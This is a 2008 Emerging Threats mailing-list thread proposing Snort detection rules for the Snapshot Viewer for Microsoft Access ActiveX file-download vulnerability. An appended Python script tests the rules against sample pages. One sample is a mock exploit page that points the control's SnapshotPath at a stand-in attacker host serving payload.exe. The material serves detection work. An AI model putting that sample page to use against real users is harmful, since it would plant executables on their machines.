[Emerging-Sigs] Sig for MS Office Snapshot

Matt Jonkman jonkman at jonkmans.com
Mon Jul 14 11:23:49 EDT 2008


Got some more info privately about the vulnerability. How we're doing it 
is the best that can be done for now. But I'll split this into 3 sigs like so:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"ET 
CURRENT_EVENTS Snapshot Viewer for Microsoft Access ActiveX Control 
Arbitrary File Download (1)"; flow:to_client,established; 
content:"clsid"; nocase; content:"F0E42D50-368C-11D0-AD81-00A0C90DC8D9"; 
nocase; pcre:"/(SnapshotPath|CompressedPath|PrintSnapshot)/i"; 
pcre:"/(exe|bat|com|dll|ini)/i"; reference:bugtraq,30114; 
reference:url,downloads.securityfocus.com/vulnerabilities/exploits/30114.html; 
reference:url,pstgroup.blogspot.com/2008/07/exploitmicrosoft-office-snapshot-viewer.html; 
classtype:web-application-attack; sid:2008407; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"ET 
CURRENT_EVENTS Snapshot Viewer for Microsoft Access ActiveX Control 
Arbitrary File Download (2)"; flow:to_client,established; 
content:"clsid"; nocase; content:"F0E42D60-368C-11D0-AD81-00A0C90DC8D9"; 
nocase; pcre:"/(SnapshotPath|CompressedPath|PrintSnapshot)/i"; 
pcre:"/(exe|bat|com|dll|ini)/i"; reference:bugtraq,30114; 
reference:url,downloads.securityfocus.com/vulnerabilities/exploits/30114.html; 
reference:url,pstgroup.blogspot.com/2008/07/exploitmicrosoft-office-snapshot-viewer.html; 
classtype:web-application-attack; sid:2008408; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"ET 
CURRENT_EVENTS Snapshot Viewer for Microsoft Access ActiveX Control 
Arbitrary File Download (3)"; flow:to_client,established; 
content:"clsid"; nocase; content:"F2175210-368C-11D0-AD81-00A0C90DC8D9"; 
nocase; pcre:"/(SnapshotPath|CompressedPath|PrintSnapshot)/i"; 
pcre:"/(exe|bat|com|dll|ini)/i"; reference:bugtraq,30114; 
reference:url,downloads.securityfocus.com/vulnerabilities/exploits/30114.html; 
reference:url,pstgroup.blogspot.com/2008/07/exploitmicrosoft-office-snapshot-viewer.html; 
classtype:web-application-attack; sid:2008409; rev:1;)

Look good to everyone? Thanks Chandan!!

Matt

chandan wrote:
> Signature for  Microsoft Office Snapshot Viewer ActiveX control.
> 
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"Snapshot 
> Viewer for Microsoft Access ActiveX Control Arbitrary File Download"; 
> flow:to_client,established; content:"clsid"; nocase; 
> pcre:"/(F0E42D50-368C-11D0-AD81-00A0C90DC8D9|F0E42D60-368C-11D0-AD81-00A0C90DC8D9|F2175210-368C-11D0-AD81-00A0C90DC8D9)/i"; 
> pcre:"/(SnapshotPath|CompressedPath|PrintSnapshot)/i"; 
> pcre:"/(exe|bat|com|dll|ini)/i"; reference:bugtraq,30114; 
> reference:url,downloads.securityfocus.com/vulnerabilities/exploits/30114.html; 
> reference:url,pstgroup.blogspot.com/2008/07/exploitmicrosoft-office-snapshot-viewer.html; 
> classtype:web-application-attack; sid:9003; rev:1;)
> 
> Regards,
> Chandan
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs

-- 
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc
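To see what the three split rules actually fire on, here is an added example (mine, not code from the thread or from the ET rule set) that emulates the rule options in Python over three constructed HTTP response bodies. The CLSIDs and the two pcre patterns are copied from the rules above; the page contents, hostnames and the all-zero CLSID in the second sample are placeholders I made up. The third sample shows the caveat a deployer should expect: because the extension pcre is unanchored, a page that merely loads a .snp report from a host like `example.com` matches on the "exe" inside "example" and the trailing "com".

```python
import re

# The three split rules from the thread share every option except the CLSID content match.
# (sid, CLSID) pairs taken from the rules above.
RULES = [
    (2008407, "F0E42D50-368C-11D0-AD81-00A0C90DC8D9"),
    (2008408, "F0E42D60-368C-11D0-AD81-00A0C90DC8D9"),
    (2008409, "F2175210-368C-11D0-AD81-00A0C90DC8D9"),
]

# The two pcre options common to all three rules, copied verbatim (both /i).
PROPERTY_RE = re.compile(r"(SnapshotPath|CompressedPath|PrintSnapshot)", re.I)
EXTENSION_RE = re.compile(r"(exe|bat|com|dll|ini)", re.I)


def matching_sids(body: bytes) -> list[int]:
    """Return the SIDs of the rules whose options all match a server-to-client body.

    Emulates the rule options only: content:"clsid"; nocase; content:"<CLSID>"; nocase;
    plus the two pcres. Snort content matches are unanchored, case-insensitive (nocase)
    substring searches, which bytes `in` on a lower-cased copy reproduces.
    flow:to_client,established is assumed satisfied, i.e. the caller only passes
    HTTP response bodies.
    """
    lowered = body.lower()
    if b"clsid" not in lowered:
        return []
    text = body.decode("latin-1")
    if not (PROPERTY_RE.search(text) and EXTENSION_RE.search(text)):
        return []
    return [sid for sid, clsid in RULES if clsid.lower().encode() in lowered]


# Constructed sample 1: a page that instantiates the control by its CLSID and drives the
# properties named in the rule toward an .exe. Written only to exercise the rule keywords;
# the host name is a placeholder and this is not a copy of the referenced exploit.
SNAPSHOT_DOWNLOAD_PAGE = rb"""<html><body>
<object classid="clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9" id="snap"></object>
<script>
snap.SnapshotPath = "http://attacker.invalid/payload.exe";
snap.CompressedPath = "C:\\temp\\payload.exe";
snap.PrintSnapshot();
</script>
</body></html>"""

# Constructed sample 2: some other control (placeholder all-zero CLSID) plus a download link.
# "clsid" and an extension are present, but none of the Snapshot Viewer properties, so nothing fires.
OTHER_CONTROL_PAGE = rb"""<html><body>
<object classid="clsid:00000000-0000-0000-0000-000000000000"></object>
<a href="setup.exe">download</a>
</body></html>"""

# Constructed sample 3: a legitimate-looking use of the control loading a .snp report from an
# intranet host (placeholder name). It still fires because the extension pcre is unanchored:
# "example" contains "exe" and the host name ends in "com".
INTRANET_REPORT_PAGE = rb"""<html><body>
<object classid="clsid:F2175210-368C-11D0-AD81-00A0C90DC8D9" id="snap"></object>
<script>snap.SnapshotPath = "http://reports.example.com/q2.snp";</script>
</body></html>"""


if __name__ == "__main__":
    for name, page in [("snapshot download", SNAPSHOT_DOWNLOAD_PAGE),
                       ("other control", OTHER_CONTROL_PAGE),
                       ("intranet report", INTRANET_REPORT_PAGE)]:
        print(f"{name}: fires {matching_sids(page) or 'nothing'}")
```

Run as a script it reports which SID each sample body would trigger: the first hits 2008407 only (the CLSID is what separates the three rules), the second hits nothing because the property pcre gates the match, and the third hits 2008409 even though no executable is involved. If that third case is too noisy for a given network, the place to tighten is the extension pcre, for instance by anchoring it to a quoted path ending in the extension rather than to any substring.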
